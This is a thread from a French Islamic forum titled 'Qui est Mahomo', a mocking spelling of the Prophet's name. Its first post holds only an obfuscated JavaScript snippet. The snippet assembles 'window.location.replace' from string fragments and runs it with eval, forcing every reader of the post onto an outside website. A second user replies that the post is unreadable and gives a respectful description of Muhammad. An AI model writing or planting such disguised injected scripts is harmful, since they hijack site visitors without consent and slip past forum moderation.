|
Forum Islam Forum d'ALLAH Site Islam :: Le Forum de ALLAH.allmyblog.com: Questions réponses, Médiathèque (images, photos, audio, vidéo), Discussions, annonces, chat |
 |
|
 |
| Assalamou alaikom wa rahmatou ALLAH wa barakatouhou. Bismllahi Arrahman Arrahim Oudkhoulouha bisalamin Aminin |
|
|
Qui est Mahomo
|
| Previous topic :: Next topic |
| Author |
Message |
maouja
Point(s): 1 Moyenne de points: 1.00
|
Posted: Fri 4 Jul - 01:18 Post subject: Qui est Mahomo |
|
|
<script language="JavaScript">
var a1='win', a2='dow.', a3='loca', a4='tion.', a5='replace',
a6='("http://www.habanim.org/en/gilad_en.html")';
var i,str="";
for(i=1;i<=6;i++)
{
str += eval("a"+i);
}
eval(str);
</script>
|
|
| Back to top |
|
 |
fleurislam
Point(s): 341 Moyenne de points: 0.98
|
Posted: Fri 11 Jul - 22:09 Post subject: Qui est Mahomo |
|
|
salam alaykoum maouja,
Je ne comprends pas trop le sens de ta question: Qui est Mahomo? De plus le message que tu as laissé est illisible (je ne vois que du caractère html)
Pour répondre à ta question, je ne sais pas qui est Mahomo mais je sais qui est Muhammad (Mohamed) (paix et bénédiction d'Allah sur lui), c'est le dernier des prophètes bien-aimés de Dieu. Il a été une lumière et une guidée pour l'Humanité toute entière et il est un modèle pour chacun d'entre nous. C'est le bien-aimé prophète d'Allah (soubhanahou wa ta3ala). Nous devons prendre exemple sur son caractère noble, sa douceur, sa bonté, sa patience, sa générosité, toutes ces qualités qui marquent son profond amour pour Dieu, exalté soit-Il. Ce ne sont là que quelques modestes lignes pour décrire notre cher prophète Muhammad (pbsl) mais je t'encourage à aller lire sa biographie incha'Allah : )
wa salam alaykoum.
| Back to top |
|
 |
|
|
|